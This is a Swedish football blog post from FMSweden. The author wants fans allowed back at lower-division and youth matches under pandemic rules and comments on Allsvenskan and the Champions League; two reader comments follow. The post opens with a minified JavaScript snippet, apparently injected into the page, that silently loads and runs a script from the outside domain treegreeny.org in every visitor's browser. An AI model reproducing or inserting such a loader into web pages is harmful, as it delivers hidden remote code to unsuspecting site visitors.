;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Vill äta en kokkorv och titta på dålig fotboll – FMSweden
Meny Stäng

Fabbes blogg: Vill äta en kokkorv och titta på dålig fotboll

Denna veckan tänkte jag slå in öppna dörrar, kräva att någon avgår, och avsluta med att vara lite positiv. Häng med!

Hur fan kan det få vara fullsmockat på Ullared när man inte får kolla allsvensk fotboll live? Hand upp alla som hört den kommentaren senaste veckorna! Ja, jag förstår att fotbollen inte alltid kan vara prioriterad. Jag vet också att flertalet av våra grannländer lyckats med det som vi ännu inte gjort. Vill dock snarare slå ett slag för nivåerna under elitfotbollen, som jag hoppas att representanter från fotbollsförbundet tänker på i dialogen med kulturministern. Hur kan det vara förbjudet för mig att gå och kolla på en lokal division sex-match fortfarande? Är det själva fotbollsspelandet som är problemet eller varför kvarstår det direktivet? För de 40 närmsta sörjande som brukar vara och se en match i division 6 Borås är ju inte värre än de 40 som träffas på Ica en fredagseftermiddag. Där tycker jag man kan inleda med att släppa på direktiven och något som borde vara prioritet. Att föräldrar kan få se sina barn spela ungdomsfotboll igen, att vi får ta den där kokta, vattniga, egentligen ganska äckliga korven med Johnnys sötstarka i kiosken och se snedsparkar, kapningar i knähöjd och smalbensvolly i krysset tillsammans igen. Självklart med två meter mellan varandra, men ändå en form av gemenskap som jag saknar så in i bänken. Har vi tur kanske hemmalaget till och med tänt hamburgargrillen lagom till halvtid?

Nu är ju det här som sagt att slå in en öppen dörr, men lik förbannat är det helt orimligt. Jag säger som Jonas Gardell: AVGÅ!

———————————————-

Nu är ligorna avslutade och vi kan äntligen andas ut efter en evighetslång säsong. Glöm det! Nu drar vi direkt igång med Europa League imorgon och Champions League på fredag. Vilka jag tror vinner Champions League? Sätter mina riksdaler på PSG, så vill ni vinna pengar – spela på något av de andra lagen.

———————————————-

I allsvenskan fortsätter alla lag slå alla. Nya spännande AIK blev utskrattade AIK och med ny tränare tog man en blytung poäng i 0-0-matchen mot jumbon Kalmar. Starkt! Falkenberg fick äntligen vinna, Elfsborg svänger det om, Norrköping har tappat formen och Malmö kommer vinna SM-guld. Just det, Blåvitt har 3 segrar på 18 senaste allsvenska matcherna. Det är fan inte bra!

———————————————-

Vilket jobb grabbarna på FM Sweden har gjort med nya sidan. Bara att lyfta på hatten för sättet och engagemanget Pontus, Tobbe, Peter och Danne tagit sig an den här uppgiften. Kommer bli grymt roligt att fortsätta se utveckligen. Tänk så skôj vi ska ha!

Ciao

Please wait...

Liknande Inlägg

10 kommentarer

  1. JS7

    Kan bara hålla med, där min moderklubb spelar så finns det gott om utrymme plus att man är ju fortfarande ute. Vad kan det komma på en match i de lägre serierna 50-150? Det är pengar som alla småklubbs lagen är i behov av. Ska ju som i vanliga fall betalas för domare och dyl.

  2. Micke

    Kloka ord som vanligt Fabbe! Allt från div 2 och nedåt egentligen borde ju gå att lösa publikmässigt med avstånd osv. Samtidigt är det svårt att låta bli att snegla lite på Danmark som börjat släppa in lite publik i högstaligan redan nu, särskilt eftersom dödstalen i Sverige sjunkit betänkligt på sistone. Varför skulle inte det kunna gå med reducerad publik i Sverige också? Beläggningsgraden på de flesta arenor är ändå relativt låg vanligtvis, tillåt endast årskortsinnehavare på matcherna till att börja med iaf. Gäller att vara konstruktiv för att hitta lösningar framöver.

Lämna ett svar